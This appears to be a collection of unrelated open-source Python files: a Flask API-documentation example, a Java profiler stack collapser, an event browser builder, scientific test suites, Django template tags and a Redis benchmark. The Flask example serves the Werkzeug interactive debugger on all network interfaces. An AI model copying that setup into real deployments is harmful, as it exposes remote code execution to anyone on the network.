soulnothing/FlaskReDoc | example/exampleapplication.py | 1 | 3734 | import sys
import re
import json
from flask import current_app, render_template, render_template_string
from flask import Flask, jsonify
from threading import Thread
from flaskredoc import ReDoc
from werkzeug.wsgi import DispatcherMiddleware
from werkzeug.serving import run_simple
from werkzeug.debug import DebuggedApplication
import os
"""
This is an example application is does not actually do anything really.
All responses are canned and sometimes randomize json structures. It is
meant to show the ease of documenting your application.
"""
resp_folder=os.path.join(os.getcwd(), 'responses')
app = Flask(__name__)
app.debug = True
@app.route('/')
def blah():
'''
The entry point function, that just prints a string.
Function with out much purpose, just returns a string.
* @CODE 200: A successful response.
* @RESPONSE: sample.txt, Example Successful Response, 200 OK
'''
return "This is an example application, please see the help section"
@app.route('/db/user/<username>')
@app.route('/db/user', defaults={"username": None})
def query_user(username):
"""
Returns a json structure containing user information.
Takes in a username as a parameter either as a GET paramater or in the
url structure. It retrieves basic information including the username,
group, user id, and location. Case of the user name does not matter,
as the provided user name is forced to lower case prior to querying.
* @RESPONSE: db-user-query.json, Example Successful response, 200 OK
* query: /db/users/bob
* description: Querying for the user bob and gathering user information.
* @RESPONSE: db-users-query-error.json, Example User Does not exist, 400 BAD Response
* query: /db/users/gizmo
* description: Querying a non existent user.
* @RESPONSE: db-users-query-no-param.json, Example Invalid Parameters, 400 BAD Response
* query: /db/users
* description: No username is specified in the query.
* @GROUP: Database, User Management
* @URL 1 username: Specify the username to retrieve from the database.
* @GET username: Specify the username to retrieve from the database.
* @CODE 200: Successful response
* @CODE 400: Bad response queried user does not exist, or no parameters provided.
"""
return "user query"
@app.route('/db/users')
def query_users():
"""
Returns a list of all users.
Queries the database and returns an array
of all valid user names from the database.
* @RESPONSE: db-query-users.json, Example Successful Response, 200 OK
* query: /db/users
* description: A query to list all users.
* @RESPONSE: db-query-users-location.json, Example Successful Location Response, 200 OK
* query: /db/users?location=Dallas
* description: Query the Dallas location for it's users.
* @RESPONSE: db-query-users-group.xml, Example Successful Group Response, 200 OK
* query: /db/users?group=it
* description: Query the group it for it's users. Due to antiquated systems this is in xml.
* @GET group: Specify the group, you wish to get a list of users for.
* @GET location: Specify the location you wish to get a list of users for.
* @CODE 200: A successful response.
"""
return "users"
if __name__ == "__main__":
doc = ReDoc(app=app, respfolder=os.path.join(os.getcwd(), 'responses'))
doc.doc_app()
frontend = doc.create_frontend()
frontend.debug = True
api = doc.create_help_api()
api.debug = True
application = DispatcherMiddleware(app, {'/help': frontend,
'/help/api': api
})
run_simple('0.0.0.0', 5000, application, use_reloader=True, use_debugger=True)
| mit | 8,131,353,653,670,957,000 | 37.895833 | 99 | 0.697108 | false | 3.959703 | false | false | false |
cykl/hprof2flamegraph | stackcollapse_hpl.py | 1 | 8006 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014, Clément MATHIEU
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
import struct
import collections
import sys
import re
Method = collections.namedtuple('Method', ['id', 'file_name', 'class_name', 'method_name'])
Trace = collections.namedtuple('Trace', ['thread_id', 'frame_count', 'frames'])
Frame = collections.namedtuple('Frame', ['bci', 'line_no', 'method_id'])
AGENT_ERRORS = [
"No Java Frames[ERR=0]",
"No class load[ERR=-1]",
"GC Active[ERR=-2]",
"Unknown not Java[ERR=-3]",
"Not walkable not Java[ERR=-4]",
"Unknown Java[ERR=-5]",
"Not walkable Java[ERR=-6]",
"Unknown state[ERR=-7]",
"Thread exit[ERR=-8]",
"Deopt[ERR=-9]",
"Safepoint[ERR=-10]",
]
def parse_hpl_string(fh):
(length,) = struct.unpack('>i', fh.read(4))
(val,) = struct.unpack('>%ss' % length, fh.read(length))
return val.decode('utf-8')
def parse_hpl(filename):
traces = []
methods = {}
for (index, error) in enumerate(AGENT_ERRORS):
method_id = -1 - index
methods[method_id] = Method(method_id, "", "/Error/", error)
with open(filename, 'rb') as fh:
while True:
marker_str = fh.read(1)
if not marker_str:
break
(marker,) = struct.unpack('>b', marker_str)
if marker == 0:
break
elif marker == 1 or marker == 11:
(frame_count, thread_id) = struct.unpack('>iQ', fh.read(4 + 8))
# marker is 11, read the time
if marker == 11:
(time_sec, time_nano) = struct.unpack('>QQ', fh.read(8+8))
if frame_count > 0:
traces.append(Trace(thread_id, frame_count, []))
else: # Negative frame_count are used to report error
if abs(frame_count) > len(AGENT_ERRORS):
method_id = frame_count - 1
methods[method_id] = Method(method_id, "Unknown err[ERR=%s]" % frame_count)
frame = Frame(None, None, frame_count - 1)
traces.append(Trace(thread_id, 1, [frame]))
elif marker == 2:
(bci, method_id) = struct.unpack('>iQ', fh.read(4 + 8))
frame = Frame(bci, None, method_id)
traces[-1].frames.append(frame)
elif marker == 21:
(bci, line_no, method_id) = struct.unpack('>iiQ', fh.read(4 + 4 + 8))
if line_no < 0: # Negative line_no are used to report that line_no is not available (-100 & -101)
line_no = None
frame = Frame(bci, line_no, method_id)
traces[-1].frames.append(frame)
elif marker == 3:
(method_id,) = struct.unpack('>Q', fh.read(8))
file_name = parse_hpl_string(fh)
class_name = parse_hpl_string(fh)
method_name = parse_hpl_string(fh)
methods[method_id] = Method(method_id, file_name, class_name, method_name)
elif marker == 31:
(method_id,) = struct.unpack('>Q', fh.read(8))
file_name = parse_hpl_string(fh)
class_name = parse_hpl_string(fh)
class_name_generic = parse_hpl_string(fh)
method_name = parse_hpl_string(fh)
method_signature = parse_hpl_string(fh)
method_signature_generic = parse_hpl_string(fh)
methods[method_id] = Method(method_id, file_name, class_name, method_name)
elif marker == 4: # 4 means thread meta, not useful in flame graph
(thread_id,) = struct.unpack('>Q', fh.read(8))
thread_name = parse_hpl_string(fh)
else:
raise Exception("Unexpected marker: %s at offset %s" % (marker, fh.tell()))
return traces, methods
def abbreviate_package(class_name):
match_object = re.match(r'(?P<package>.*\.)(?P<remainder>[^.]+\.[^.]+)$', class_name)
if match_object is None:
return class_name
shortened_pkg = re.sub(r'(\w)\w*', r'\1', match_object.group('package'))
return "%s%s" % (shortened_pkg, match_object.group('remainder'))
def get_method_name(method, shorten_pkgs):
class_name = method.class_name[1:-1].replace('/', '.')
if shorten_pkgs:
class_name = abbreviate_package(class_name)
method_name = class_name
method_name += '.' + method.method_name
return method_name
def format_frame(frame, method, discard_lineno, shorten_pkgs):
formatted_frame = get_method_name(method, shorten_pkgs)
if not discard_lineno and frame.line_no:
formatted_frame += ':' + str(frame.line_no)
return formatted_frame
def main(argv=None, out=sys.stdout):
import argparse
parser = argparse.ArgumentParser(description='Convert an hpl file into Flamegraph collapsed stacks')
parser.add_argument('hpl_file', metavar='FILE', type=str, nargs=1, help='A hpl file')
parser.add_argument('--discard-lineno', dest='discard_lineno', action='store_true', help='Remove line numbers')
parser.add_argument('--discard-thread', dest='discard_thread', action='store_true', help='Remove thread info')
parser.add_argument('--shorten-pkgs', dest='shorten_pkgs', action='store_true', help='Shorten package names')
parser.add_argument('--skip-trace-on-missing-frame', dest='skip_trace_on_missing_frame', action='store_true', help='Continue processing even if frames are missing')
args = parser.parse_args(argv)
filename = args.hpl_file[0]
(traces, methods) = parse_hpl(filename)
folded_stacks = collections.defaultdict(int)
for trace in traces:
frames = []
skip_trace = False
for frame in trace.frames:
if args.skip_trace_on_missing_frame and not frame.method_id in methods:
sys.stderr.write("skipped missing frame %s\n" % frame.method_id)
skip_trace = True
break
frames.append(format_frame(
frame,
methods[frame.method_id],
args.discard_lineno,
args.shorten_pkgs
))
if skip_trace:
continue
if not args.discard_thread:
frames.append('Thread %s' % trace.thread_id)
folded_stack = ';'.join(reversed(frames))
folded_stacks[folded_stack] += 1
for folded_stack in sorted(folded_stacks):
sample_count = folded_stacks[folded_stack]
print("%s %s" % (folded_stack, sample_count), file=out)
return 0
if __name__ == '__main__':
main()
| bsd-2-clause | 1,047,224,140,835,399,000 | 39.226131 | 168 | 0.602998 | false | 3.78666 | false | false | false |
AdrienGuille/pyMABED | build_event_browser.py | 1 | 3036 | # coding: utf-8
# std
import time
import argparse
import os
import shutil
# web
from flask import Flask, render_template
from flask_frozen import Freezer
# mabed
import mabed.utils as utils
__author__ = "Adrien Guille"
__email__ = "[email protected]"
event_browser = Flask(__name__, static_folder='browser/static', template_folder='browser/templates')
@event_browser.route('/')
def index():
return render_template('template.html',
events=event_descriptions,
event_impact='[' + ','.join(impact_data) + ']',
k=mabed.k,
theta=mabed.theta,
sigma=mabed.sigma)
if __name__ == '__main__':
p = argparse.ArgumentParser(description='Build event browser')
p.add_argument('i', metavar='input', type=str, help='Input pickle file')
p.add_argument('--o', metavar='output', type=str, help='Output html directory', default=None)
args = p.parse_args()
print('Loading events from %s...' % args.i)
mabed = utils.load_events(args.i)
# format data
print('Preparing data...')
event_descriptions = []
impact_data = []
formatted_dates = []
for i in range(0, mabed.corpus.time_slice_count):
formatted_dates.append(int(time.mktime(mabed.corpus.to_date(i).timetuple()))*1000)
for event in mabed.events:
mag = event[0]
main_term = event[2]
raw_anomaly = event[4]
formatted_anomaly = []
time_interval = event[1]
related_terms = []
for related_term in event[3]:
related_terms.append(related_term[0]+' ('+str("{0:.2f}".format(related_term[1]))+')')
event_descriptions.append((mag,
str(mabed.corpus.to_date(time_interval[0])),
str(mabed.corpus.to_date(time_interval[1])),
main_term,
', '.join(related_terms)))
for i in range(0, mabed.corpus.time_slice_count):
value = 0
if time_interval[0] <= i <= time_interval[1]:
value = raw_anomaly[i]
if value < 0:
value = 0
formatted_anomaly.append('['+str(formatted_dates[i])+','+str(value)+']')
impact_data.append('{"key":"' + main_term + '", "values":[' + ','.join(formatted_anomaly) + ']}')
if args.o is not None:
if os.path.exists(args.o):
shutil.rmtree(args.o)
os.makedirs(args.o)
print('Freezing event browser into %s...' % args.o)
event_browser_freezer = Freezer(event_browser)
event_browser.config.update(
FREEZER_DESTINATION=args.o,
FREEZER_RELATIVE_URLS=True,
)
event_browser.debug = False
event_browser.config['ASSETS_DEBUG'] = False
event_browser_freezer.freeze()
print('Done.')
else:
event_browser.run(debug=False, host='localhost', port=2016)
| mit | -3,382,823,232,691,615,000 | 34.717647 | 105 | 0.553689 | false | 3.657831 | false | false | false |
mganeva/mantid | qt/python/mantidqt/widgets/codeeditor/test/test_multifileinterpreter.py | 1 | 2516 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2017 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
# This file is part of the mantid workbench.
#
#
from __future__ import (absolute_import, unicode_literals)
import unittest
from mantid.py3compat import mock
from mantidqt.utils.qt.testing import GuiTest
from mantidqt.utils.qt.testing.qt_widget_finder import QtWidgetFinder
from mantidqt.widgets.codeeditor.multifileinterpreter import MultiPythonFileInterpreter
MANTID_API_IMPORT = "from mantid.simpleapi import *\n"
PERMISSION_BOX_FUNC = ('mantidqt.widgets.codeeditor.scriptcompatibility.'
'permission_box_to_prepend_import')
class MultiPythonFileInterpreterTest(GuiTest, QtWidgetFinder):
def test_default_contains_single_editor(self):
widget = MultiPythonFileInterpreter()
self.assertEqual(1, widget.editor_count)
def test_add_editor(self):
widget = MultiPythonFileInterpreter()
self.assertEqual(1, widget.editor_count)
widget.append_new_editor()
self.assertEqual(2, widget.editor_count)
def test_open_file_in_new_tab_import_added(self):
test_string = "Test file\nLoad()"
widget = MultiPythonFileInterpreter()
mock_open_func = mock.mock_open(read_data=test_string)
with mock.patch(widget.__module__ + '.open', mock_open_func, create=True):
with mock.patch(PERMISSION_BOX_FUNC, lambda: True):
widget.open_file_in_new_tab(test_string)
self.assertEqual(widget.current_editor().editor.isModified(), True,
msg="Script not marked as modified.")
self.assertIn(MANTID_API_IMPORT, widget.current_editor().editor.text(),
msg="'simpleapi' import not added to script.")
def test_open_file_in_new_tab_no_import_added(self):
test_string = "Test file\n"
widget = MultiPythonFileInterpreter()
mock_open_func = mock.mock_open(read_data=test_string)
with mock.patch(widget.__module__ + '.open', mock_open_func, create=True):
with mock.patch(PERMISSION_BOX_FUNC, lambda: True):
widget.open_file_in_new_tab(test_string)
self.assertNotIn(MANTID_API_IMPORT,
widget.current_editor().editor.text())
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -4,618,802,130,108,384,000 | 40.933333 | 87 | 0.675278 | false | 3.62536 | true | false | false |
matus-stehlik/glowing-batman | base/templatetags/roots_tags.py | 1 | 1874 | from django import template
from django.core.urlresolvers import reverse
from django.conf import settings
from django.template.base import TemplateSyntaxError
register = template.Library()
@register.simple_tag
def url_active(request, urls, *args, **kwargs):
if request.path in (reverse(url, args=list(*args), kwargs=dict(**kwargs))
for url in urls.split()):
return "active"
else:
return ""
@register.filter
def remove_uncomplete_latex(text):
# Even number of segments separated by $$ means uncomplete
# display equation
if len(text.split('$$')) % 2 == 0:
# Return the original text
return '$$'.join(text.split('$$')[:-1])
elif len(text.split('$')) % 2 == 0:
return '$'.join(text.split('$')[:-1])
else:
return text
class DefineNode(template.Node):
def __init__(self, name, nodelist):
self.name = name
self.nodelist = nodelist
def __repr__(self):
return "<DefineNode>"
def render(self, context):
context[self.name] = self.nodelist.render(context)
return ''
@register.tag
def define(parser, token):
"""
Adds a name to the context for referencing an arbitrarily defined block
of template code.
For example:
{% define my_block %}
This is the content.
{% enddefine %}
Now anywhere in the template:
{{ my_block }}
"""
bits = list(token.split_contents())
if len(bits) != 2:
raise TemplateSyntaxError("Expected format is: {% define variable %}")
name = bits[1]
nodelist = parser.parse(('enddefine',))
parser.delete_first_token()
return DefineNode(name, nodelist)
@register.filter
def access(value, arg):
return value.get(arg, {})
@register.simple_tag
def settings_value(name):
return getattr(settings, name, "")
| mit | -6,420,556,990,031,565,000 | 22.425 | 78 | 0.61953 | false | 3.978769 | false | false | false |
lzhjie/benchmark | client_redis.py | 1 | 1166 | # coding: utf-8
# Copyright (C) zhongjie luo <[email protected]>
import redis
from db_bench import DbConnection, multi_process_bench, Options
class StrictRedis(DbConnection):
def __init__(self, options):
super(StrictRedis, self).__init__(options)
self.__db = 0
self.__client = None
def connect(self):
self.__client = redis.StrictRedis(self.host, self.port, self.__db)
def disconnect(self):
self.__client = None
def insert(self, record):
k, v = record[0]
return self.__client.set(str(k), str(v), nx=True) == True
def search(self, record):
k, v = record[0]
return self.__client.get(str(k)) == str(v)
def delete(self, record):
k, v = record[0]
return self.__client.delete(str(k)) == True
def tear_down(self):
self.__client.flushdb()
def api_example():
pass
if __name__ == "__main__":
option = Options()
option.set("port", 6379)
if option.parse_option() is False:
exit(100)
print(option)
result = multi_process_bench(option, StrictRedis)
# print result
| mit | 9,135,346,619,652,901,000 | 22.808511 | 74 | 0.56518 | false | 3.544073 | false | false | false |
jaeilepp/mne-python | mne/simulation/tests/test_raw.py | 1 | 13124 | # Authors: Mark Wronkiewicz <[email protected]>
# Yousra Bekhti <[email protected]>
# Eric Larson <[email protected]>
#
# License: BSD (3-clause)
import os.path as op
import warnings
from copy import deepcopy
import numpy as np
from numpy.testing import assert_allclose, assert_array_equal
from nose.tools import assert_true, assert_raises, assert_equal
from mne import (read_source_spaces, pick_types, read_trans, read_cov,
make_sphere_model, create_info, setup_volume_source_space,
find_events, Epochs, fit_dipole, transform_surface_to,
make_ad_hoc_cov, SourceEstimate, setup_source_space)
from mne.chpi import _calculate_chpi_positions, read_head_pos, _get_hpi_info
from mne.tests.test_chpi import _assert_quats
from mne.datasets import testing
from mne.simulation import simulate_sparse_stc, simulate_raw
from mne.io import read_raw_fif, RawArray
from mne.time_frequency import psd_welch
from mne.utils import _TempDir, run_tests_if_main, slow_test
warnings.simplefilter('always')
data_path = testing.data_path(download=False)
raw_fname = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc_raw.fif')
cov_fname = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc-cov.fif')
trans_fname = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc-trans.fif')
subjects_dir = op.join(data_path, 'subjects')
bem_path = op.join(subjects_dir, 'sample', 'bem')
src_fname = op.join(bem_path, 'sample-oct-2-src.fif')
bem_fname = op.join(bem_path, 'sample-320-320-320-bem-sol.fif')
raw_chpi_fname = op.join(data_path, 'SSS', 'test_move_anon_raw.fif')
pos_fname = op.join(data_path, 'SSS', 'test_move_anon_raw_subsampled.pos')
def _make_stc(raw, src):
"""Helper to make a STC."""
seed = 42
sfreq = raw.info['sfreq'] # Hz
tstep = 1. / sfreq
n_samples = len(raw.times) // 10
times = np.arange(0, n_samples) * tstep
stc = simulate_sparse_stc(src, 10, times, random_state=seed)
return stc
def _get_data():
"""Helper to get some starting data."""
# raw with ECG channel
raw = read_raw_fif(raw_fname).crop(0., 5.0).load_data()
data_picks = pick_types(raw.info, meg=True, eeg=True)
other_picks = pick_types(raw.info, meg=False, stim=True, eog=True)
picks = np.sort(np.concatenate((data_picks[::16], other_picks)))
raw = raw.pick_channels([raw.ch_names[p] for p in picks])
raw.info.normalize_proj()
ecg = RawArray(np.zeros((1, len(raw.times))),
create_info(['ECG 063'], raw.info['sfreq'], 'ecg'))
for key in ('dev_head_t', 'buffer_size_sec', 'highpass', 'lowpass', 'dig'):
ecg.info[key] = raw.info[key]
raw.add_channels([ecg])
src = read_source_spaces(src_fname)
trans = read_trans(trans_fname)
sphere = make_sphere_model('auto', 'auto', raw.info)
stc = _make_stc(raw, src)
return raw, src, stc, trans, sphere
@testing.requires_testing_data
def test_simulate_raw_sphere():
"""Test simulation of raw data with sphere model."""
seed = 42
raw, src, stc, trans, sphere = _get_data()
assert_true(len(pick_types(raw.info, meg=False, ecg=True)) == 1)
# head pos
head_pos_sim = dict()
# these will be at 1., 2., ... sec
shifts = [[0.001, 0., -0.001], [-0.001, 0.001, 0.]]
for time_key, shift in enumerate(shifts):
# Create 4x4 matrix transform and normalize
temp_trans = deepcopy(raw.info['dev_head_t'])
temp_trans['trans'][:3, 3] += shift
head_pos_sim[time_key + 1.] = temp_trans['trans']
#
# Test raw simulation with basic parameters
#
raw_sim = simulate_raw(raw, stc, trans, src, sphere, read_cov(cov_fname),
head_pos=head_pos_sim,
blink=True, ecg=True, random_state=seed)
raw_sim_2 = simulate_raw(raw, stc, trans_fname, src_fname, sphere,
cov_fname, head_pos=head_pos_sim,
blink=True, ecg=True, random_state=seed)
assert_array_equal(raw_sim_2[:][0], raw_sim[:][0])
# Test IO on processed data
tempdir = _TempDir()
test_outname = op.join(tempdir, 'sim_test_raw.fif')
raw_sim.save(test_outname)
raw_sim_loaded = read_raw_fif(test_outname, preload=True)
assert_allclose(raw_sim_loaded[:][0], raw_sim[:][0], rtol=1e-6, atol=1e-20)
del raw_sim, raw_sim_2
# with no cov (no noise) but with artifacts, most time periods should match
# but the EOG/ECG channels should not
for ecg, eog in ((True, False), (False, True), (True, True)):
raw_sim_3 = simulate_raw(raw, stc, trans, src, sphere,
cov=None, head_pos=head_pos_sim,
blink=eog, ecg=ecg, random_state=seed)
raw_sim_4 = simulate_raw(raw, stc, trans, src, sphere,
cov=None, head_pos=head_pos_sim,
blink=False, ecg=False, random_state=seed)
picks = np.arange(len(raw.ch_names))
diff_picks = pick_types(raw.info, meg=False, ecg=ecg, eog=eog)
these_picks = np.setdiff1d(picks, diff_picks)
close = np.isclose(raw_sim_3[these_picks][0],
raw_sim_4[these_picks][0], atol=1e-20)
assert_true(np.mean(close) > 0.7)
far = ~np.isclose(raw_sim_3[diff_picks][0],
raw_sim_4[diff_picks][0], atol=1e-20)
assert_true(np.mean(far) > 0.99)
del raw_sim_3, raw_sim_4
# make sure it works with EEG-only and MEG-only
raw_sim_meg = simulate_raw(raw.copy().pick_types(meg=True, eeg=False),
stc, trans, src, sphere, cov=None,
ecg=True, blink=True, random_state=seed)
raw_sim_eeg = simulate_raw(raw.copy().pick_types(meg=False, eeg=True),
stc, trans, src, sphere, cov=None,
ecg=True, blink=True, random_state=seed)
raw_sim_meeg = simulate_raw(raw.copy().pick_types(meg=True, eeg=True),
stc, trans, src, sphere, cov=None,
ecg=True, blink=True, random_state=seed)
assert_allclose(np.concatenate((raw_sim_meg[:][0], raw_sim_eeg[:][0])),
raw_sim_meeg[:][0], rtol=1e-7, atol=1e-20)
del raw_sim_meg, raw_sim_eeg, raw_sim_meeg
# check that different interpolations are similar given small movements
raw_sim = simulate_raw(raw, stc, trans, src, sphere, cov=None,
head_pos=head_pos_sim, interp='linear')
raw_sim_hann = simulate_raw(raw, stc, trans, src, sphere, cov=None,
head_pos=head_pos_sim, interp='hann')
assert_allclose(raw_sim[:][0], raw_sim_hann[:][0], rtol=1e-1, atol=1e-14)
del raw_sim, raw_sim_hann
# Make impossible transform (translate up into helmet) and ensure failure
head_pos_sim_err = deepcopy(head_pos_sim)
head_pos_sim_err[1.][2, 3] -= 0.1 # z trans upward 10cm
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
ecg=False, blink=False, head_pos=head_pos_sim_err)
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src,
bem_fname, ecg=False, blink=False,
head_pos=head_pos_sim_err)
# other degenerate conditions
assert_raises(TypeError, simulate_raw, 'foo', stc, trans, src, sphere)
assert_raises(TypeError, simulate_raw, raw, 'foo', trans, src, sphere)
assert_raises(ValueError, simulate_raw, raw, stc.copy().crop(0, 0),
trans, src, sphere)
stc_bad = stc.copy()
stc_bad.tstep += 0.1
assert_raises(ValueError, simulate_raw, raw, stc_bad, trans, src, sphere)
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
chpi=True) # no cHPI info
assert_raises(ValueError, simulate_raw, raw, stc, trans, src, sphere,
interp='foo')
assert_raises(TypeError, simulate_raw, raw, stc, trans, src, sphere,
head_pos=1.)
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
head_pos=pos_fname) # ends up with t>t_end
head_pos_sim_err = deepcopy(head_pos_sim)
head_pos_sim_err[-1.] = head_pos_sim_err[1.] # negative time
assert_raises(RuntimeError, simulate_raw, raw, stc, trans, src, sphere,
head_pos=head_pos_sim_err)
raw_bad = raw.copy()
raw_bad.info['dig'] = None
assert_raises(RuntimeError, simulate_raw, raw_bad, stc, trans, src, sphere,
blink=True)
@slow_test
@testing.requires_testing_data
def test_simulate_raw_bem():
"""Test simulation of raw data with BEM."""
raw, src, stc, trans, sphere = _get_data()
src = setup_source_space('sample', 'oct1', subjects_dir=subjects_dir)
for s in src:
s['nuse'] = 3
s['vertno'] = src[1]['vertno'][:3]
s['inuse'].fill(0)
s['inuse'][s['vertno']] = 1
# use different / more complete STC here
vertices = [s['vertno'] for s in src]
stc = SourceEstimate(np.eye(sum(len(v) for v in vertices)), vertices,
0, 1. / raw.info['sfreq'])
raw_sim_sph = simulate_raw(raw, stc, trans, src, sphere, cov=None)
raw_sim_bem = simulate_raw(raw, stc, trans, src, bem_fname, cov=None,
n_jobs=2)
# some components (especially radial) might not match that well,
# so just make sure that most components have high correlation
assert_array_equal(raw_sim_sph.ch_names, raw_sim_bem.ch_names)
picks = pick_types(raw.info, meg=True, eeg=True)
n_ch = len(picks)
corr = np.corrcoef(raw_sim_sph[picks][0], raw_sim_bem[picks][0])
assert_array_equal(corr.shape, (2 * n_ch, 2 * n_ch))
med_corr = np.median(np.diag(corr[:n_ch, -n_ch:]))
assert_true(med_corr > 0.65, msg=med_corr)
# do some round-trip localization
for s in src:
transform_surface_to(s, 'head', trans)
locs = np.concatenate([s['rr'][s['vertno']] for s in src])
tmax = (len(locs) - 1) / raw.info['sfreq']
cov = make_ad_hoc_cov(raw.info)
# The tolerance for the BEM is surprisingly high (28) but I get the same
# result when using MNE-C and Xfit, even when using a proper 5120 BEM :(
for use_raw, bem, tol in ((raw_sim_sph, sphere, 1),
(raw_sim_bem, bem_fname, 31)):
events = find_events(use_raw, 'STI 014')
assert_equal(len(locs), 6)
evoked = Epochs(use_raw, events, 1, 0, tmax, baseline=None).average()
assert_equal(len(evoked.times), len(locs))
fits = fit_dipole(evoked, cov, bem, trans, min_dist=1.)[0].pos
diffs = np.sqrt(np.sum((locs - fits) ** 2, axis=-1)) * 1000
med_diff = np.median(diffs)
assert_true(med_diff < tol, msg='%s: %s' % (bem, med_diff))
@slow_test
@testing.requires_testing_data
def test_simulate_raw_chpi():
"""Test simulation of raw data with cHPI."""
raw = read_raw_fif(raw_chpi_fname, allow_maxshield='yes')
picks = np.arange(len(raw.ch_names))
picks = np.setdiff1d(picks, pick_types(raw.info, meg=True, eeg=True)[::4])
raw.load_data().pick_channels([raw.ch_names[pick] for pick in picks])
raw.info.normalize_proj()
sphere = make_sphere_model('auto', 'auto', raw.info)
# make sparse spherical source space
sphere_vol = tuple(sphere['r0'] * 1000.) + (sphere.radius * 1000.,)
src = setup_volume_source_space('sample', sphere=sphere_vol, pos=70.)
stc = _make_stc(raw, src)
# simulate data with cHPI on
raw_sim = simulate_raw(raw, stc, None, src, sphere, cov=None, chpi=False,
interp='zero')
# need to trim extra samples off this one
raw_chpi = simulate_raw(raw, stc, None, src, sphere, cov=None, chpi=True,
head_pos=pos_fname, interp='zero')
# test cHPI indication
hpi_freqs, hpi_pick, hpi_ons = _get_hpi_info(raw.info)
assert_allclose(raw_sim[hpi_pick][0], 0.)
assert_allclose(raw_chpi[hpi_pick][0], hpi_ons.sum())
# test that the cHPI signals make some reasonable values
picks_meg = pick_types(raw.info, meg=True, eeg=False)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
for picks in [picks_meg[:3], picks_eeg[:3]]:
psd_sim, freqs_sim = psd_welch(raw_sim, picks=picks)
psd_chpi, freqs_chpi = psd_welch(raw_chpi, picks=picks)
assert_array_equal(freqs_sim, freqs_chpi)
freq_idx = np.sort([np.argmin(np.abs(freqs_sim - f))
for f in hpi_freqs])
if picks is picks_meg:
assert_true((psd_chpi[:, freq_idx] >
100 * psd_sim[:, freq_idx]).all())
else:
assert_allclose(psd_sim, psd_chpi, atol=1e-20)
# test localization based on cHPI information
quats_sim = _calculate_chpi_positions(raw_chpi, t_step_min=10.)
quats = read_head_pos(pos_fname)
_assert_quats(quats, quats_sim, dist_tol=5e-3, angle_tol=3.5)
run_tests_if_main()
| bsd-3-clause | -239,478,660,592,898,980 | 45.211268 | 79 | 0.604846 | false | 3.036557 | true | false | false |
CMUSV-VisTrails/WorkflowRecommendation | vistrails/core/cache/utils.py | 1 | 2304 | ###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
"""Helper functions for cache package."""
try:
import hashlib
sha_hash = hashlib.sha1
except ImportError:
import sha
sha_hash = sha.new
##############################################################################
def hash_list(lst, hasher_f, constant_hasher_map={}):
hasher = sha_hash()
hash_l = [hasher_f(el, constant_hasher_map) for el in lst]
hash_l.sort()
for hel in hash_l: hasher.update(hel)
return hasher.digest()
| bsd-3-clause | 1,477,760,557,045,283,600 | 45.08 | 79 | 0.659722 | false | 4.580517 | false | false | false |
